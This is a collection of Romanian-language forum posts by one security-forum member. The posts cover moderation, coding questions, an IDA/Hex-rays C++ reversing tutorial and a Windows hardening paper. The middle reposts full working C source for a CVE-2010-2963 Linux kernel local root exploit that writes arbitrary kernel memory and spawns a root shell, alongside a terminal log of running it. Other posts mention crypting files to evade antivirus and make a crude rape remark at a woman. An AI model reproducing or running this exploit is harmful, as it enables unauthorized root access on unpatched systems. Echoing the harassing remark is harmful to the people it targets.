Nytro

Ce face: var times = 2; while (times < 2 ) { print( "hello" ); times }; ?

Hmmm: Macro Language ImageJ: Image processing and analysis in Java - Macro-uri. E o posibilitate.

Haide, nu vrei sa te violeze 50 de barbati, ce fel de femeie esti? Daca esti paranoica te poti deghiza in barbat. Lasati prostiile si nu va mai abateti de la subiect.

Probabil Javascript, dar nu inteleg acel "print" si acel "times".

Da, felicitari, dar nu stiu daca a fost util sa oferi informatii personale...

A revenit anotimpul banurilor? Se vede ca "a inceput lumea scoala"...

Te simti mai bine acum? Da, ai incalcat o regula, si anume: "Nu ai 10 posturi". Regula e utila, deoarece forumul ar fi plini de leecheri ca tine, care nu contribuie cu nimic si vin doar cu miloaga. De bine, de rau, membrii cu vechime au ajutat multe persoane, tu ce ai facut? Daca esti membru vechi, trebuia sa postezi cu acel cont, dar poate e banat. In plus, ai si un avertisment de la mine pentru insultarea unui membru.

Eu initial intelesesem ca e pentru Market. Dar nu prea sunt conflicte acolo. Iar acolo, totul tine de cat ii duce capul pe cumparator si vazator. Daca o sa plece toti de la ideea "Nu am incredere in nimeni" o sa fie in regula. De ce ar fi nevoie de "Court"? Ca te injura Vasile? Asa si? Primeste avertisment, apoi ban. Si nu o sa se mai repete. Flame-urile nu se rezolva asa... Parca am fii copii, chiar nu suntem in stare sa aratam ca suntem maturi, ca putem rezolva singuri o "disputa"?

Se merita, o sa ma vedeti pe mine :->

Informativ. Ban. Sursa: RST - Search Results

Perfect, chestii utile si bine de stiut. Thanks.

Ah, chiar, uitasem ce e mai important... Oricum am inteles ca nu se mai foloseste video4linux la versiunile de Ubuntu (cel putin) mai mari de 10.04. Am mai incercat acum la munca pe o versiune, dar nu imi compila, zicea ca lipseste un header. Am instalat libv4l-dev si degeaba, aceeasi problema.

La mine nu a vrut, pe 2.6.39. Cred ca am si o versiune mai veche, o sa incerc si pe ea. Deocamdata: nytro@rst:~$ whoami nytro nytro@rst:~$ uname -a Linux rst 2.6.39nytro #1 SMP Fri May 20 01:14:36 EEST 2011 i686 GNU/Linux nytro@rst:~$ cd Documents/ nytro@rst:~/Documents$ gcc exploit.c -o exploit exploit.c: In function ‘hollywood_status’: exploit.c:77: warning: left shift count >= width of type exploit.c: In function ‘kernel_write’: exploit.c:104: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint64_t’ nytro@rst:~/Documents$ chmod +x exploit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bfcdbf3c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede5eb48 Attacking ... [*] Overwriting at 0xede5eb48 with 0 bytes from 0x4 /dev/video0: No such file or directory nytro@rst:~/Documents$ whoami nytro nytro@rst:~/Documents$ mknod /dev/video0 c 81 0 mknod: `/dev/video0': Permission denied nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bf87210c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748 Attacking ... [*] Overwriting at 0xede58748 with 0 bytes from 0x4 /dev/video0: Permission denied nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# chmod 666 /dev/video0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bfa9b57c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748 Attacking ... [*] Overwriting at 0xede58748 with 0 bytes from 0x4 /dev/video0: No such device or address nytro@rst:~/Documents$ ls /dev/video* /dev/video0 nytro@rst:~/Documents$ lsmod Module Size Used by videodev 78103 0 binfmt_misc 6420 1 parport_pc 25796 0 ppdev 5064 0 dm_crypt 13696 0 mac80211 246236 0 snd_hda_codec_hdmi 21534 1 snd_hda_codec_realtek 248102 1 snd_hda_intel 21720 2 snd_hda_codec 84130 3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel snd_hwdep 4984 1 snd_hda_codec snd_pcm 70434 3 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec snd_seq_midi 4364 0 r8192se_pci 445895 0 snd_rawmidi 17462 1 snd_seq_midi joydev 8489 0 snd_seq_midi_event 5959 1 snd_seq_midi cfg80211 145102 1 mac80211 snd_seq 46035 2 snd_seq_midi,snd_seq_midi_event snd_timer 18315 2 snd_pcm,snd_seq snd_seq_device 5562 3 snd_seq_midi,snd_rawmidi,snd_seq snd 48219 14 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device psmouse 61369 0 serio_raw 3776 0 soundcore 888 1 snd snd_page_alloc 7096 2 snd_hda_intel,snd_pcm lp 7085 0 hp_wmi 7204 0 parport 30699 3 parport_pc,ppdev,lp sparse_keymap 3478 1 hp_wmi i915 467399 2 usbhid 34350 0 hid 68860 1 usbhid usb_storage 39698 0 drm_kms_helper 32119 1 i915 drm 183577 3 i915,drm_kms_helper ahci 18634 2 i2c_algo_bit 4913 1 i915 libahci 19882 1 ahci intel_agp 9562 1 i915 intel_gtt 13592 3 i915,intel_agp r8169 36279 0 agpgart 29117 3 drm,intel_agp,intel_gtt video 11166 1 i915 mii 4434 1 r8169 nytro@rst:~/Documents$ Pe o alta versiune (2.6.35): nytro@rst:~$ whoami nytro nytro@rst:~$ lsmod Module Size Used by binfmt_misc 6599 1 vboxnetadp 6454 0 vboxnetflt 15152 0 vboxdrv 190199 2 vboxnetadp,vboxnetflt parport_pc 26058 0 ppdev 5556 0 dm_crypt 11385 0 snd_hda_codec_intelhdmi 9812 1 joydev 8767 0 snd_hda_codec_realtek 218492 1 snd_hda_intel 22235 2 snd_hda_codec 87552 3 snd_hda_codec_intelhdmi,snd_hda_codec_realtek,snd_hda_intel r8192se_pci 469516 0 psmouse 59033 0 serio_raw 4022 0 snd_hwdep 5040 1 snd_hda_codec hp_wmi 5223 0 snd_pcm 71475 2 snd_hda_intel,snd_hda_codec snd_seq_midi 4588 0 mac80211 231959 0 snd_rawmidi 17783 1 snd_seq_midi snd_seq_midi_event 6047 1 snd_seq_midi snd_seq 47174 2 snd_seq_midi,snd_seq_midi_event snd_timer 19067 2 snd_pcm,snd_seq lp 7342 0 snd_seq_device 5744 3 snd_seq_midi,snd_rawmidi,snd_seq snd 49038 13 snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device cfg80211 144694 2 r8192se_pci,mac80211 soundcore 880 1 snd snd_page_alloc 7120 2 snd_hda_intel,snd_pcm parport 31492 3 parport_pc,ppdev,lp dm_raid45 81721 0 xor 15136 1 dm_raid45 i915 295435 3 usbhid 36882 0 drm_kms_helper 30200 1 i915 hid 67742 1 usbhid drm 168060 3 i915,drm_kms_helper usb_storage 40204 0 intel_agp 26566 2 i915 ahci 19198 2 r8169 36521 0 libahci 21728 1 ahci mii 4425 1 r8169 agpgart 32011 2 drm,intel_agp i2c_algo_bit 5168 1 i915 video 18712 1 i915 output 1883 1 video ramzswap 9555 0 lzo_compress 1865 1 ramzswap nytro@rst:~$ cd Documents/ nytro@rst:~/Documents$ ls /dev/video* ls: cannot access /dev/video*: No such file or directory nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016cd40 [*] Resolved prepare_kernel_cred to 0x00000000c016d190 [*] Exploit payload function pointer at 0x00000000bf8dc72c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048 Attacking ... [*] Overwriting at 0xf415a048 with 0 bytes from 0x4 /dev/video0: No such file or directory nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0 root@rst:/home/nytro/Documents# chmod 666 /dev/video0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016cd40 [*] Resolved prepare_kernel_cred to 0x00000000c016d190 [*] Exploit payload function pointer at 0x00000000bfbcabbc [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048 Attacking ... [*] Overwriting at 0xf415a048 with 0 bytes from 0x4 /dev/video0: No such device or address nytro@rst:~/Documents$ uname -a Linux rst 2.6.35-28-generic #50-Ubuntu SMP Fri Mar 18 19:00:26 UTC 2011 i686 GNU/Linux nytro@rst:~/Documents$ PS: Probabil kernelele mele nu au fost compilate cu suport pentru video4linux. Nu e nimeni cu Ubuntu 10.04 sa incerce asta?

Ubuntu 10.04 (kernel 2.6.36?) - Local Root Privilege Escalation Exploit Nu sunt sigur ca functioneaza. Ma uitam azi pe o prezentare de la Defconf 19 si am dat peste el. E vorba de aceasta problema: CVE - CVE-2010-2963 (under review) drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L) implementation in the Linux kernel before 2.6.36 on 64-bit platforms does not validate the destination of a memory copy operation, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this device. Info: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-2963) Exploit: /* * Stand-alone CVE-2010-2963 exploit, tuned for unpatched Ubuntu 10.04 * Kees Cook <kees@ubuntu.com> * * Thanks to Dan Rosenberg for net target/trigger (with thanks to * netstat authors for INET_DIAG parsing code). * Thanks to Brad Spengler for symbols parser and creds payload. * Greets to pipacs, redpig, nelhage, segoon, taviso, solardiz. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <time.h> #include <sys/wait.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/inet_diag.h> #include <sys/utsname.h> #include <string.h> #include <sys/mman.h> #include <errno.h> #include <netinet/in.h> #include <sys/types.h> #include <linux/videodev.h> #include <syscall.h> /* 32bit __NR_ioctl syscall 54 */ #include <asm/unistd_32.h> #define IOCTL_SYSCALL __NR_ioctl #define PORT 31337 /* Trigger socket, just listens briefly */ #define SOCK_OFFSET 584 /* offsetof(struct sock, sk_destruct) */ #define DEVICE "/dev/video0" unsigned int syscall32(unsigned int syscall, unsigned int arg1, unsigned int arg2, unsigned int arg3) { unsigned int rc; asm volatile( "movl %1, %%ebx;\n" "movl %2, %%ecx;\n" "movl %3, %%edx;\n" "movl %4, %%eax;\n" "int $0x80;\n" "movl %%eax, %0;\n" /* output */ : "=g"(rc) /* input */ : "g"(arg1), "g"(arg2), "g"(arg3), "g"(syscall) /* clobbered registers */ : "%eax", "%ebx", "%ecx", "%edx" ); return rc; } int hollywood = 0; void hollywood_status(char *format, unsigned long value) { unsigned long mask = 0x0; unsigned long drama; int counter; if (!hollywood) { printf(format, value); printf("\n"); return; } for (counter = 0 ; ; counter ++) { drama = ((unsigned long)rand() << (sizeof(int)*8)) | (unsigned long)rand(); printf("\r"); printf(format, (drama & ~mask) | (value & mask)); fflush(NULL); usleep(10000); if (mask == ~0x0UL) break; if (counter % 16 == 0) { mask |= (0xFFUL << ((rand() % sizeof(mask))*8)); } } printf("\n"); } struct video_code32 { char loadwhat[16]; int datasize; int padding; uint64_t data; }; int kernel_write(uint64_t destination, void *source, int length) { static struct video_code32 *vc; static struct video_tuner *tuner; int dev; unsigned int code; printf("[*] Overwriting at 0x%lx with %d bytes from %p\n", destination, length, source); if ( (dev=open(DEVICE, O_RDWR)) < 0) { perror(DEVICE); exit(1); } printf(" - Opened %s\n", DEVICE); if (hollywood) sleep(3); if (!vc) { vc = (struct video_code32*)mmap(NULL, sizeof(*vc), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0); if (vc == MAP_FAILED) { perror("mmap"); exit(1); } } if (!tuner) { tuner = (struct video_tuner*)mmap(NULL, sizeof(*tuner), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0); if (tuner == MAP_FAILED) { perror("mmap"); exit(1); } } vc->datasize = length; vc->data = (uint64_t)(uintptr_t)source; memset(tuner, 0xBB, sizeof(*tuner)); // manual union, since a real union won't do ptrs for 64bit uint64_t *ptr = (uint64_t*)(&(tuner->name[20])); *ptr = destination; printf(" - Spamming VIDIOCSTUNER ioctl ...\n"); // beat memory into the stack... code = 0x40347605; // VIDIOCSTUNER syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); /* VIDIOCSMICROCODE32, the misconstructed VIDIOCSMICROCODE */ code = 0x4020761b; syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)vc); printf(" - VIDIOCSMICROCODE ioctl completed\n"); return 0; } /* Get the address of the sock struct for our socket */ unsigned long get_sock_addr(unsigned int port) { FILE *f; char buf[1024]; unsigned int testport, a; unsigned long addr, b; f = fopen("/proc/net/tcp", "r"); if (f < 0) { printf("[*] Failed to open /proc/net/tcp\n"); return 0; } while (fgets(buf, 1024, f)) { sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X " "%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u " "%d\n", &a, &a, &testport, &a, &a, &a, &a, &a, &a, &b, &a, &a, &a, &b, &a, (void **)&addr, &b, &b, &a, &a, &a); if (testport == port) goto out; } addr = 0; out: fclose(f); return addr; } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { char *msg; asprintf(&msg, "[*] Resolved %s to 0x%%016lx", name); hollywood_status(msg, addr); free(msg); fclose(f); return addr; } } fclose(f); if (rep) return 0; fallback: /* didn't find the symbol, let's retry with the System.map dedicated to the pointlessness of Russell Coker's SELinux test machine (why does he keep upgrading the kernel if "all necessary security can be provided by SE Linux"?) */ uname(&ver); if (strncmp(ver.release, "2.6", 3)) oldstyle = 1; sprintf(sname, "/boot/System.map-%s", ver.release); f = fopen(sname, "r"); if (f == NULL) return 0; rep = 1; goto repeat; } int sock; unsigned long choose_target() { unsigned long target; struct sockaddr_in addr; printf("[*] Opening trigger socket listener on port %d ...\n", PORT); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[*] Failed to open trigger socket.\n"); exit(1); } memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = INADDR_ANY; if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) { printf("[*] Failed to bind trigger socket.\n"); exit(1); } /* Our socket won't appear in /proc/net/tcp unless it's listening */ if (listen(sock, 1)) { printf("[*] Failed to listen on trigger socket.\n"); exit(1); } target = get_sock_addr(PORT); if (!target) { printf("[*] Failed to get trigger socket address via INET_DIAG.\n"); exit(1); } target += SOCK_OFFSET; hollywood_status("[*] Trigger struct sock address + offset of sk_destruct: 0x%016lx", target); return target; } void trigger_target() { if (hollywood) sleep(2); printf("[*] Triggering payload...\n"); if (hollywood) sleep(3); close(sock); } unsigned long get_payload_addr(void) { commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); return (uintptr_t)getroot; } int main(int argc, char * argv[]) { unsigned long payload; unsigned long target; srand(time(NULL)); // Hollywood level randomness! if (argc>1 && !strcmp(argv[1],"--hollywood")) hollywood = 1; printf("Preparing ...\n"); payload = get_payload_addr(); hollywood_status("[*] Exploit payload function pointer at 0x%016lx", (uintptr_t)&payload); target = choose_target(); printf("Attacking ...\n"); kernel_write(target, (void*)&payload, sizeof(payload)); trigger_target(); if (getuid()) { printf("[*] Failed to get root.\n"); return -1; } if (hollywood) { printf("[*] *dramatic chord*\n"); sleep(2); } printf("[*] Pwnage complete!\n"); execl("/bin/sh", "sh", NULL); perror("execl"); return 1; } Nu am deocamdata prea multe detalii, daca am timp sa ma informez revin cu informatii.

Poti face ce doresti cu el, poti sa modifici ce vrei, nu va fi nicio problema.

Da, este un fel de versiune imbunatatita a acestuia, dar parca l-am refacut de la 0. Uite Selenity CMS, e un fel de ultima versiune. Il gasesti si aici la RST Power. http://www65.zippyshare.com/v/1073349/file.html Screenshot AdminCP: http://i56.tinypic.com/2ccs4s8.jpg

Pe mine nu ma deranjeaza sa fiu filmat daca ma descurc si iese bine

Trebuie sa facem ceva, ce putem, orice.

E de cel putin 3 ani, arata urat si nu are mai deloc optiuni. Deci nu are rost... Nici nu stiu daca il mai am.

Eu o sa vin

Nu stiu ce ai scanat tu... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 Si asta e cu un fisier simplu si inofensiv cryptat, pentru ca stub-ul e detectabil.

Reversing C++ programs with IDA pro and Hex-rays Introduction During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard. Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function: v81 = 9; v63 = *(_DWORD *)(v62 + 88); if ( v63 ) { v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24); if ( v64 ) v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString); } It’s our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output: padding = *Dst; if ( padding < 4 ) return -1; buffer_skip_bytes(this2->decrypted_input_buffer, 5u); buffer_skip_end(this2->decrypted_input_buffer, padding); if ( this2->encrypt_in != null ) { if ( this2->compression_in != null ) { buffer_reinit(this2->compression_buffer_in); packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in); buffer_reinit(this2->decrypted_input_buffer); avail_len = buffer_avail_bytes(this2->compression_buffer_in); ptr = buffer_get_data_ptr(this2->compression_buffer_in); buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len); } } packet_type = buffer_get_u8(this2->decrypted_input_buffer); *len = buffer_avail_bytes(this2->decrypted_input_buffer); this2->packet_len = 0; return packet_type; Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help. All my samples here have been compiled either with visual studio or Gnu C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest. Structure of a C++ program It is not my goal to teach you how OOP works, you already know that. We’ll just see how it works (and is implemented) in the big lines. Class = data structure + code (methods). The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler. Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions. Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes. Object creation int __cdecl sub_80486E4() { void *v0; // ebx@1 v0 = (void *)operator new(8); sub_8048846(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor. The next function call is a little cryptic. It’s doing two pointer deferences on v0 before calling it. It’s a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could no stay true for multiple inheritance. I did not test). Let’s do some IDA magic: Rename the symbols Just click on a name, press « n » and give a meaningful name. Since we don’t know yet what our class do, I suggest we name the class « class1 », and use this convention until we’ve understood what our class do. It’s very possible that we’re going to discover other classes before we finished digging class1, so I suggest we simply continue naming classes as we find them. int __cdecl main() { void *v0; // ebx@1 v0 = (void *)operator new(8); class1::ctor(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Create structures The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures. Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here ! Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result. Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1’s declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic. We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor. Analysis of the constructor int __cdecl class1::ctor(void *a1) { sub_80487B8(a1); *(_DWORD *)a1 = &off_8048A38; return puts("B:()"); } You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big is our vtable (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes. It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view. The strange call in the constructor int __cdecl sub_80487B8(int a1) { int result; // eax@1 *(_DWORD *)a1 = &off_8048A50; puts("A::A()"); result = a1; *(_DWORD *)(a1 + 4) = 42; return result; } The call to the « sub_80487b8() » function in the constructor reveals us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we’re in yet another constructor. Don’t retype the type « class1 » for argument « a1 », since we’re not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let’s do the same work as in class1. The only difference it that we do not know exactly the size of its member. There are two ways of figuring it out: Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members. Look at the methods in the vtable, and try to guess what’s the highest member ever accessed. In our case, « class2 ::ctor » accesses the 4 bytes after the 4 first ones and set it to 42. Since its child-class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children. Study of the destructors Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it. if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->method_3)(v0); … void __cdecl class1::m3(class1 *a1) { class1::m2(a1); operator delete(a1); } … void __cdecl class1::m2(class1 *a1) { a1->vtable = (class1_vtable *)&class1__vtable; puts("B::~B()"); class2::m2((class2 *)a1); } … void __cdecl class2::m2(class2 *a1) { a1->vtable = (class2_vtable *)&class2__vtable; puts("A::~A()"); } What we can see here is the following: class1 ::m3 is a destructor, which calls class1 ::m2 which is the main destructor of class1. What this destructor do is ensure that we’re well in « class1 » context, by setting back the vtable to is « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way. Hey, what are all these casts? Why do I have two structures defining the same fields? What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: For each class, define a classXX_members, classXX_vtable, classXX structure. classXX contains +++ vtable (typed to classXX_vtable *) +++ classXX-1_members (members of the superclass) +++ classXX_members, if any classXX_vtable contains +++classXX-1_vtable +++classXX’s vptrs, if any Ideally, you should start from the main class to the children, until you end up in an edge class. In our exemple, here’s the « solution » of our sample: 00000000 class1 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 class2_members class2_members ? 00000008 class1 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class1_members struc ; (sizeof=0x0) 00000000 class1_members ends 00000000 00000000 ; ----------------------------------------------00000000 00000000 class1_vtable struc ; (sizeof=0xC) 00000000 class2_vtable class2_vtable ? 0000000C class1_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 members class2_members ? 00000008 class2 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class2_vtable struc ; (sizeof=0xC) 00000000 method_1 dd ? ; offset 00000004 dtor dd ? ; offset 00000008 delete dd ? ; offset 0000000C class2_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2_members struc ; (sizeof=0x4) 00000000 field_0 dd ? 00000004 class2_members ends 00000004 int __cdecl main() { class1 *v0; // ebx@1 v0 = (class1 *)operator new(8); class1::ctor(v0); ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0); if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0); return 0; } int __cdecl class1::ctor(class1 *a1) { class2::ctor((class2 *)a1); a1->vtable = (class1_vtable *)&class1__vtable; return puts("B:()"); } class2 *__cdecl class2::ctor(class2 *a1) { class2 *result; // eax@1 a1->vtable = (class2_vtable *)&class2__vtable; puts("A::A()"); result = a1; a1->members.field_0 = 42; return result; } In brief When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name Start from the ancestor and go up to the children Look at the constructors and destructors first, check out the references to new() and static methods. Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in childclasses constructors, or even at the place of the instantiation. If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once. Use and abuse Hex-rays’ typing system, it’s very powerful. Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them. Sources Try this at home ! The binary (elf32 stripped) The source file. Don’t open it too fast ! Sursa: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll

Hardening Windows Applications olleB - olle @ toolcrypt.org About this document This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you. Introduction to Windows security In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows). Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf

